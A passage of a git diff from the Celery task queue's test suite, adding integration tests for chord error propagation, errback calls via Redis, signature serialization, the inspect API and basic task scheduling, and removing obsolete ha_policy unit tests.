+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ fail_sig = fail.s()
+ fail_sig_id = fail_sig.freeze().id
+ child_sig = chain(identity.si(42), fail_sig)
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails at the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = fail_sig_id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(
+ msg="Error propagates from header chain which fails at the end"
+ ):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(
+ msg="Errback is called after header chain which fails at the end"
+ ):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_error_propagates_to_chord_from_group(self, manager, subtests):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ child_sig = group(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+
+ def test_immutable_errback_called_by_chord_from_group(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback_msg = str(uuid.uuid4()).encode()
+ redis_key = str(uuid.uuid4())
+ errback = redis_echo.si(errback_msg, redis_key=redis_key)
+ child_sig = group(identity.si(42), fail.s())
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ await_redis_echo({errback_msg, }, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_group(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ errback = errback_task.s()
+ fail_sig = fail.s()
+ fail_sig_id = fail_sig.freeze().id
+ child_sig = group(identity.si(42), fail_sig)
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ expected_redis_key = fail_sig_id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ await_redis_count(1, redis_key=expected_redis_key)
+ redis_connection.delete(expected_redis_key)
+
+ def test_immutable_errback_called_by_chord_from_group_fail_multiple(
+ self, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ fail_task_count = 42
+ redis_key = str(uuid.uuid4())
+ errback = redis_count.si(redis_key=redis_key)
+ # Include a mix of passing and failing tasks
+ child_sig = group(
+ *(identity.si(42) for _ in range(24)), # arbitrary task count
+ *(fail.s() for _ in range(fail_task_count)),
+ )
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from header group"):
+ redis_connection.delete(redis_key)
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ # NOTE: Here we only expect the errback to be called once since it
+ # is attached to the chord body which is a single task!
+ await_redis_count(1, redis_key=redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ redis_connection.delete(redis_key)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ # NOTE: Here we expect the errback to be called once per failing
+ # task in the chord body since it is a group
+ await_redis_count(fail_task_count, redis_key=redis_key)
+ redis_connection.delete(redis_key)
+
+ @pytest.mark.parametrize(
+ "errback_task", [errback_old_style, errback_new_style, ],
+ )
+ def test_mutable_errback_called_by_chord_from_group_fail_multiple(
+ self, errback_task, manager, subtests
+ ):
+ if not manager.app.conf.result_backend.startswith("redis"):
+ raise pytest.skip("Requires redis result backend.")
+ redis_connection = get_redis_connection()
+
+ fail_task_count = 42
+ # We have to use failing task signatures with unique task IDs to ensure
+ # the chord can complete when they are used as part of its header!
+ fail_sigs = tuple(
+ fail.s() for _ in range(fail_task_count)
+ )
+ fail_sig_ids = tuple(s.freeze().id for s in fail_sigs)
+ errback = errback_task.s()
+ # Include a mix of passing and failing tasks
+ child_sig = group(
+ *(identity.si(42) for _ in range(24)), # arbitrary task count
+ *fail_sigs,
+ )
+
+ chord_sig = chord((child_sig, ), identity.s())
+ chord_sig.link_error(errback)
+ expected_redis_key = chord_sig.body.freeze().id
+ redis_connection.delete(expected_redis_key)
+ with subtests.test(msg="Error propagates from header group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after header group fails"):
+ # NOTE: Here we only expect the errback to be called once since it
+ # is attached to the chord body which is a single task!
+ await_redis_count(1, redis_key=expected_redis_key)
+
+ chord_sig = chord((identity.si(42), ), child_sig)
+ chord_sig.link_error(errback)
+ for fail_sig_id in fail_sig_ids:
+ redis_connection.delete(fail_sig_id)
+ with subtests.test(msg="Error propagates from body group"):
+ res = chord_sig.delay()
+ with pytest.raises(ExpectedException):
+ res.get(timeout=TIMEOUT)
+ with subtests.test(msg="Errback is called after body group fails"):
+ # NOTE: Here we expect the errback to be called once per failing
+ # task in the chord body since it is a group, and each task has a
+ # unique task ID
+ for i, fail_sig_id in enumerate(fail_sig_ids):
+ await_redis_count(
+ 1, redis_key=fail_sig_id,
+ # After the first one is seen, check the rest with no
+ # timeout since waiting to confirm that each one doesn't
+ # get over-incremented will take a long time
+ timeout=TIMEOUT if i == 0 else 0,
+ )
+ for fail_sig_id in fail_sig_ids:
+ redis_connection.delete(fail_sig_id)
+
+ def test_chord_header_task_replaced_with_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ replace_with_chain.si(42),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_header_child_replaced_with_chain_first(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ (replace_with_chain.si(42), identity.s(1337), ),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
+ def test_chord_header_child_replaced_with_chain_middle(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ (identity.s(42), replace_with_chain.s(1337), identity.s(31337), ),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337, 31337]
+
+ def test_chord_header_child_replaced_with_chain_last(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ (identity.s(42), replace_with_chain.s(1337), ),
+ identity.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42, 1337]
+
+ def test_chord_body_task_replaced_with_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ replace_with_chain.s(),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_body_chain_child_replaced_with_chain_first(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ chain(replace_with_chain.s(), identity.s(), ),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_body_chain_child_replaced_with_chain_middle(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ chain(identity.s(), replace_with_chain.s(), identity.s(), ),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+ def test_chord_body_chain_child_replaced_with_chain_last(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ orig_sig = chord(
+ identity.s(42),
+ chain(identity.s(), replace_with_chain.s(), ),
+ )
+ res_obj = orig_sig.delay()
+ assert res_obj.get(timeout=TIMEOUT) == [42]
+
+
+class test_signature_serialization:
+ """
+ Confirm nested signatures can be rebuilt after passing through a backend.
+
+ These tests are expected to finish and return `None` or raise an exception
+ in the error case. The exception indicates that some element of a nested
+ signature object was not properly deserialized from its dictionary
+ representation, and would explode later on if it were used as a signature.
+ """
+
+ def test_rebuild_nested_chain_chain(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_chain_chain.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chain_group(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_chain_group.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chain_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chain_chord.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_group_chain(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_group_chain.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_group_group(self, manager):
+ sig = chain(
+ tasks.return_nested_signature_group_group.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_group_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_group_chord.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chord_chain(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chord_chain.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chord_group(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chord_group.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
+
+ def test_rebuild_nested_chord_chord(self, manager):
+ try:
+ manager.app.backend.ensure_chords_allowed()
+ except NotImplementedError as e:
+ raise pytest.skip(e.args[0])
+
+ sig = chain(
+ tasks.return_nested_signature_chord_chord.s(),
+ tasks.rebuild_signature.s()
+ )
+ sig.delay().get(timeout=TIMEOUT)
diff --git a/t/integration/test_inspect.py b/t/integration/test_inspect.py
new file mode 100644
index 00000000000..60332f0071d
--- /dev/null
+++ b/t/integration/test_inspect.py
@@ -0,0 +1,237 @@
+import os
+import re
+from datetime import datetime, timedelta
+from time import sleep
+from unittest.mock import ANY
+
+import pytest
+
+from celery.utils.nodenames import anon_nodename
+
+from .tasks import add, sleeping
+
+NODENAME = anon_nodename()
+
+_flaky = pytest.mark.flaky(reruns=5, reruns_delay=2)
+_timeout = pytest.mark.timeout(timeout=300)
+
+
+def flaky(fn):
+ return _timeout(_flaky(fn))
+
+
+@pytest.fixture()
+def inspect(manager):
+ return manager.app.control.inspect()
+
+
+class test_Inspect:
+ """Integration tests fo app.control.inspect() API"""
+
+ @flaky
+ def test_ping(self, inspect):
+ """Tests pinging the worker"""
+ ret = inspect.ping()
+ assert len(ret) == 1
+ assert ret[NODENAME] == {'ok': 'pong'}
+ # TODO: Check ping() is returning None after stopping worker.
+ # This is tricky since current test suite does not support stopping of
+ # the worker.
+
+ @flaky
+ def test_clock(self, inspect):
+ """Tests getting clock information from worker"""
+ ret = inspect.clock()
+ assert len(ret) == 1
+ assert ret[NODENAME]['clock'] > 0
+
+ @flaky
+ def test_registered(self, inspect):
+ """Tests listing registered tasks"""
+ # TODO: We can check also the exact values of the registered methods
+ ret = inspect.registered()
+ assert len(ret) == 1
+ len(ret[NODENAME]) > 0
+ for task_name in ret[NODENAME]:
+ assert isinstance(task_name, str)
+
+ ret = inspect.registered('name')
+ for task_info in ret[NODENAME]:
+ # task_info is in form 'TASK_NAME [name=TASK_NAME]'
+ assert re.fullmatch(r'\S+ \[name=\S+\]', task_info)
+
+ @flaky
+ def test_active_queues(self, inspect):
+ """Tests listing active queues"""
+ ret = inspect.active_queues()
+ assert len(ret) == 1
+ assert ret[NODENAME] == [
+ {
+ 'alias': None,
+ 'auto_delete': False,
+ 'binding_arguments': None,
+ 'bindings': [],
+ 'consumer_arguments': None,
+ 'durable': True,
+ 'exchange': {
+ 'arguments': None,
+ 'auto_delete': False,
+ 'delivery_mode': None,
+ 'durable': True,
+ 'name': 'celery',
+ 'no_declare': False,
+ 'passive': False,
+ 'type': 'direct'
+ },
+ 'exclusive': False,
+ 'expires': None,
+ 'max_length': None,
+ 'max_length_bytes': None,
+ 'max_priority': None,
+ 'message_ttl': None,
+ 'name': 'celery',
+ 'no_ack': False,
+ 'no_declare': None,
+ 'queue_arguments': None,
+ 'routing_key': 'celery'}
+ ]
+
+ @flaky
+ def test_active(self, inspect):
+ """Tests listing active tasks"""
+ res = sleeping.delay(5)
+ sleep(1)
+ ret = inspect.active()
+ assert len(ret) == 1
+ assert ret[NODENAME] == [
+ {
+ 'id': res.task_id,
+ 'name': 't.integration.tasks.sleeping',
+ 'args': [5],
+ 'kwargs': {},
+ 'type': 't.integration.tasks.sleeping',
+ 'hostname': ANY,
+ 'time_start': ANY,
+ 'acknowledged': True,
+ 'delivery_info': {
+ 'exchange': '',
+ 'routing_key': 'celery',
+ 'priority': 0,
+ 'redelivered': False
+ },
+ 'worker_pid': ANY
+ }
+ ]
+
+ @flaky
+ def test_scheduled(self, inspect):
+ """Tests listing scheduled tasks"""
+ exec_time = datetime.utcnow() + timedelta(seconds=5)
+ res = add.apply_async([1, 2], {'z': 3}, eta=exec_time)
+ ret = inspect.scheduled()
+ assert len(ret) == 1
+ assert ret[NODENAME] == [
+ {
+ 'eta': exec_time.strftime('%Y-%m-%dT%H:%M:%S.%f') + '+00:00',
+ 'priority': 6,
+ 'request': {
+ 'id': res.task_id,
+ 'name': 't.integration.tasks.add',
+ 'args': [1, 2],
+ 'kwargs': {'z': 3},
+ 'type': 't.integration.tasks.add',
+ 'hostname': ANY,
+ 'time_start': None,
+ 'acknowledged': False,
+ 'delivery_info': {
+ 'exchange': '',
+ 'routing_key': 'celery',
+ 'priority': 0,
+ 'redelivered': False
+ },
+ 'worker_pid': None
+ }
+ }
+ ]
+
+ @flaky
+ def test_query_task(self, inspect):
+ """Task that does not exist or is finished"""
+ ret = inspect.query_task('d08b257e-a7f1-4b92-9fea-be911441cb2a')
+ assert len(ret) == 1
+ assert ret[NODENAME] == {}
+
+ # Task in progress
+ res = sleeping.delay(5)
+ sleep(1)
+ ret = inspect.query_task(res.task_id)
+ assert len(ret) == 1
+ assert ret[NODENAME] == {
+ res.task_id: [
+ 'active', {
+ 'id': res.task_id,
+ 'name': 't.integration.tasks.sleeping',
+ 'args': [5],
+ 'kwargs': {},
+ 'type': 't.integration.tasks.sleeping',
+ 'hostname': NODENAME,
+ 'time_start': ANY,
+ 'acknowledged': True,
+ 'delivery_info': {
+ 'exchange': '',
+ 'routing_key': 'celery',
+ 'priority': 0,
+ 'redelivered': False
+ },
+ # worker is running in the same process as separate thread
+ 'worker_pid': ANY
+ }
+ ]
+ }
+
+ @flaky
+ def test_stats(self, inspect):
+ """tests fetching statistics"""
+ ret = inspect.stats()
+ assert len(ret) == 1
+ assert ret[NODENAME]['pool']['max-concurrency'] == 1
+ assert len(ret[NODENAME]['pool']['processes']) == 1
+ assert ret[NODENAME]['uptime'] > 0
+ # worker is running in the same process as separate thread
+ assert ret[NODENAME]['pid'] == os.getpid()
+
+ @flaky
+ def test_report(self, inspect):
+ """Tests fetching report"""
+ ret = inspect.report()
+ assert len(ret) == 1
+ assert ret[NODENAME] == {'ok': ANY}
+
+ @flaky
+ def test_revoked(self, inspect):
+ """Testing revoking of task"""
+ # Fill the queue with tasks to fill the queue
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task and revoke it
+ result = add.apply_async((1, 1))
+ result.revoke()
+ ret = inspect.revoked()
+ assert len(ret) == 1
+ assert result.task_id in ret[NODENAME]
+
+ @flaky
+ def test_conf(self, inspect):
+ """Tests getting configuration"""
+ ret = inspect.conf()
+ assert len(ret) == 1
+ assert ret[NODENAME]['worker_hijack_root_logger'] == ANY
+ assert ret[NODENAME]['worker_log_color'] == ANY
+ assert ret[NODENAME]['accept_content'] == ANY
+ assert ret[NODENAME]['enable_utc'] == ANY
+ assert ret[NODENAME]['timezone'] == ANY
+ assert ret[NODENAME]['broker_url'] == ANY
+ assert ret[NODENAME]['result_backend'] == ANY
+ assert ret[NODENAME]['broker_heartbeat'] == ANY
+ assert ret[NODENAME]['deprecated_settings'] == ANY
+ assert ret[NODENAME]['include'] == ANY
diff --git a/t/integration/test_tasks.py b/t/integration/test_tasks.py
index edfda576f5b..5596e2986bf 100644
--- a/t/integration/test_tasks.py
+++ b/t/integration/test_tasks.py
@@ -1,10 +1,16 @@
+from datetime import datetime, timedelta
+from time import perf_counter, sleep
+
import pytest
+import celery
from celery import group
from .conftest import get_active_redis_channels
-from .tasks import (ClassBasedAutoRetryTask, add, add_ignore_result,
- print_unicode, retry_once, retry_once_priority, sleeping)
+from .tasks import (ClassBasedAutoRetryTask, ExpectedException, add,
+ add_ignore_result, add_not_typed, fail, print_unicode,
+ retry, retry_once, retry_once_priority, return_properties,
+ sleeping)
TIMEOUT = 10
@@ -28,8 +34,220 @@ def test_class_based_task_retried(self, celery_session_app,
assert res.get(timeout=TIMEOUT) == 1
+def _producer(j):
+ """Single producer helper function"""
+ results = []
+ for i in range(20):
+ results.append([i + j, add.delay(i, j)])
+ for expected, result in results:
+ value = result.get(timeout=10)
+ assert value == expected
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ assert result.successful() is True
+ return j
+
+
class test_tasks:
+ def test_simple_call(self):
+ """Tests direct simple call of task"""
+ assert add(1, 1) == 2
+ assert add(1, 1, z=1) == 3
+
+ @flaky
+ def test_basic_task(self, manager):
+ """Tests basic task call"""
+ results = []
+ # Tests calling task only with args
+ for i in range(10):
+ results.append([i + i, add.delay(i, i)])
+ for expected, result in results:
+ value = result.get(timeout=10)
+ assert value == expected
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ assert result.successful() is True
+
+ results = []
+ # Tests calling task with args and kwargs
+ for i in range(10):
+ results.append([3*i, add.delay(i, i, z=i)])
+ for expected, result in results:
+ value = result.get(timeout=10)
+ assert value == expected
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ assert result.successful() is True
+
+ @flaky
+ def test_multiprocess_producer(self, manager):
+ """Testing multiple processes calling tasks."""
+ from multiprocessing import Pool
+ pool = Pool(20)
+ ret = pool.map(_producer, range(120))
+ assert list(ret) == list(range(120))
+
+ @flaky
+ def test_multithread_producer(self, manager):
+ """Testing multiple threads calling tasks."""
+ from multiprocessing.pool import ThreadPool
+ pool = ThreadPool(20)
+ ret = pool.map(_producer, range(120))
+ assert list(ret) == list(range(120))
+
+ @flaky
+ def test_ignore_result(self, manager):
+ """Testing calling task with ignoring results."""
+ result = add.apply_async((1, 2), ignore_result=True)
+ assert result.get() is None
+ # We wait since it takes a bit of time for the result to be
+ # persisted in the result backend.
+ sleep(1)
+ assert result.result is None
+
+ @flaky
+ def test_timeout(self, manager):
+ """Testing timeout of getting results from tasks."""
+ result = sleeping.delay(10)
+ with pytest.raises(celery.exceptions.TimeoutError):
+ result.get(timeout=5)
+
+ @flaky
+ def test_expired(self, manager):
+ """Testing expiration of task."""
+ # Fill the queue with tasks which took > 1 sec to process
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task with expiration = 1 sec
+ result = add.apply_async((1, 1), expires=1)
+ with pytest.raises(celery.exceptions.TaskRevokedError):
+ result.get()
+ assert result.status == 'REVOKED'
+ assert result.ready() is True
+ assert result.failed() is False
+ assert result.successful() is False
+
+ # Fill the queue with tasks which took > 1 sec to process
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task with expiration at now + 1 sec
+ result = add.apply_async((1, 1), expires=datetime.utcnow() + timedelta(seconds=1))
+ with pytest.raises(celery.exceptions.TaskRevokedError):
+ result.get()
+ assert result.status == 'REVOKED'
+ assert result.ready() is True
+ assert result.failed() is False
+ assert result.successful() is False
+
+ @flaky
+ def test_eta(self, manager):
+ """Tests tasks scheduled at some point in future."""
+ start = perf_counter()
+ # Schedule task to be executed in 3 seconds
+ result = add.apply_async((1, 1), countdown=3)
+ sleep(1)
+ assert result.status == 'PENDING'
+ assert result.ready() is False
+ assert result.get() == 2
+ end = perf_counter()
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ # Difference between calling the task and result must be bigger than 3 secs
+ assert (end - start) > 3
+
+ start = perf_counter()
+ # Schedule task to be executed at time now + 3 seconds
+ result = add.apply_async((2, 2), eta=datetime.utcnow() + timedelta(seconds=3))
+ sleep(1)
+ assert result.status == 'PENDING'
+ assert result.ready() is False
+ assert result.get() == 4
+ end = perf_counter()
+ assert result.status == 'SUCCESS'
+ assert result.ready() is True
+ # Difference between calling the task and result must be bigger than 3 secs
+ assert (end - start) > 3
+
+ @flaky
+ def test_fail(self, manager):
+ """Tests that the failing task propagates back correct exception."""
+ result = fail.delay()
+ with pytest.raises(ExpectedException):
+ result.get(timeout=5)
+ assert result.status == 'FAILURE'
+ assert result.ready() is True
+ assert result.failed() is True
+ assert result.successful() is False
+
+ @flaky
+ def test_revoked(self, manager):
+ """Testing revoking of task"""
+ # Fill the queue with tasks to fill the queue
+ for _ in range(4):
+ sleeping.delay(2)
+ # Execute task and revoke it
+ result = add.apply_async((1, 1))
+ result.revoke()
+ with pytest.raises(celery.exceptions.TaskRevokedError):
+ result.get()
+ assert result.status == 'REVOKED'
+ assert result.ready() is True
+ assert result.failed() is False
+ assert result.successful() is False
+
+ @flaky
+ def test_wrong_arguments(self, manager):
+ """Tests that proper exceptions are raised when task is called with wrong arguments."""
+ with pytest.raises(TypeError):
+ add(5)
+
+ with pytest.raises(TypeError):
+ add(5, 5, wrong_arg=5)
+
+ with pytest.raises(TypeError):
+ add.delay(5)
+
+ with pytest.raises(TypeError):
+ add.delay(5, wrong_arg=5)
+
+ # Tasks with typing=False are not checked but execution should fail
+ result = add_not_typed.delay(5)
+ with pytest.raises(TypeError):
+ result.get(timeout=5)
+ assert result.status == 'FAILURE'
+
+ result = add_not_typed.delay(5, wrong_arg=5)
+ with pytest.raises(TypeError):
+ result.get(timeout=5)
+ assert result.status == 'FAILURE'
+
+ @flaky
+ def test_retry(self, manager):
+ """Tests retrying of task."""
+ # Tests when max. retries is reached
+ result = retry.delay()
+ for _ in range(5):
+ status = result.status
+ if status != 'PENDING':
+ break
+ sleep(1)
+ assert status == 'RETRY'
+ with pytest.raises(ExpectedException):
+ result.get()
+ assert result.status == 'FAILURE'
+
+ # Tests when task is retried but after returns correct result
+ result = retry.delay(return_value='bar')
+ for _ in range(5):
+ status = result.status
+ if status != 'PENDING':
+ break
+ sleep(1)
+ assert status == 'RETRY'
+ assert result.get() == 'bar'
+ assert result.status == 'SUCCESS'
+
@flaky
def test_task_accepted(self, manager, sleep=1):
r1 = sleeping.delay(sleep)
@@ -53,6 +271,11 @@ def test_unicode_task(self, manager):
timeout=TIMEOUT, propagate=True,
)
+ @flaky
+ def test_properties(self, celery_session_worker):
+ res = return_properties.apply_async(app_id="1234")
+ assert res.get(timeout=TIMEOUT)["app_id"] == "1234"
+
class tests_task_redis_result_backend:
def setup(self, manager):
diff --git a/t/unit/app/test_amqp.py b/t/unit/app/test_amqp.py
index ee36c08e235..bc2d26d3680 100644
--- a/t/unit/app/test_amqp.py
+++ b/t/unit/app/test_amqp.py
@@ -89,23 +89,6 @@ def test_setitem_adds_default_exchange(self):
q['foo'] = queue
assert q['foo'].exchange == q.default_exchange
- @pytest.mark.parametrize('ha_policy,qname,q,qargs,expected', [
- (None, 'xyz', 'xyz', None, None),
- (None, 'xyz', 'xyz', {'x-foo': 'bar'}, {'x-foo': 'bar'}),
- ('all', 'foo', Queue('foo'), None, {'ha-mode': 'all'}),
- ('all', 'xyx2',
- Queue('xyx2', queue_arguments={'x-foo': 'bar'}),
- None,
- {'ha-mode': 'all', 'x-foo': 'bar'}),
- (['A', 'B', 'C'], 'foo', Queue('foo'), None, {
- 'ha-mode': 'nodes',
- 'ha-params': ['A', 'B', 'C']}),
- ])
- def test_with_ha_policy(self, ha_policy, qname, q, qargs, expected):
- queues = Queues(ha_policy=ha_policy, create_missing=False)
- queues.add(q, queue_arguments=qargs)
- assert queues[qname].queue_arguments == expected
-
def test_select_add(self):
q = Queues()
q.select(['foo', 'bar'])
@@ -118,11 +101,6 @@ def test_deselect(self):
q.deselect('bar')
assert sorted(q._consume_from.keys()) == ['foo']
- def test_with_ha_policy_compat(self):
- q = Queues(ha_policy='all')
- q.add('bar')
- assert q['bar'].queue_arguments == {'ha-mode': 'all'}
-
def test_add_default_exchange(self):
ex = Exchange('fff', 'fanout')
q = Queues(default_exchange=ex)
@@ -143,12 +121,6 @@ def test_alias(self):
({'max_priority': 10},
'moo', Queue('moo', queue_arguments=None),
{'x-max-priority': 10}),
- ({'ha_policy': 'all', 'max_priority': 5},
- 'bar', 'bar',
- {'ha-mode': 'all', 'x-max-priority': 5}),
- ({'ha_policy': 'all', 'max_priority': 5},
- 'xyx2', Queue('xyx2', queue_arguments={'x-max-priority': 2}),
- {'ha-mode': 'all', 'x-max-priority': 2}),
({'max_priority': None},
'foo2', 'foo2',
None),
@@ -255,10 +227,6 @@ def test_countdown_negative(self):
with pytest.raises(ValueError):
self.app.amqp.as_task_v2(uuid(), 'foo', countdown=-1232132323123)
- def test_Queues__with_ha_policy(self):
- x = self.app.amqp.Queues({}, ha_policy='all')
- assert x.ha_policy == 'all'
-
def test_Queues__with_max_priority(self):
x = self.app.amqp.Queues({}, max_priority=23)
assert x.max_priority == 23
diff --git a/t/unit/app/test_app.py b/t/unit/app/test_app.py
index 9571b401254..ed61b0f8356 100644
--- a/t/unit/app/test_app.py
+++ b/t/unit/app/test_app.py
@@ -2,13 +2,13 @@
import itertools
import os
import ssl
+import uuid
from copy import deepcopy
from datetime import datetime, timedelta
from pickle import dumps, loads
from unittest.mock import Mock, patch
import pytest
-from case import ContextMock, mock
from vine import promise
from celery import Celery, _state
@@ -16,6 +16,8 @@
from celery import current_app, shared_task
from celery.app import base as _appbase
from celery.app import defaults
+from celery.backends.base import Backend
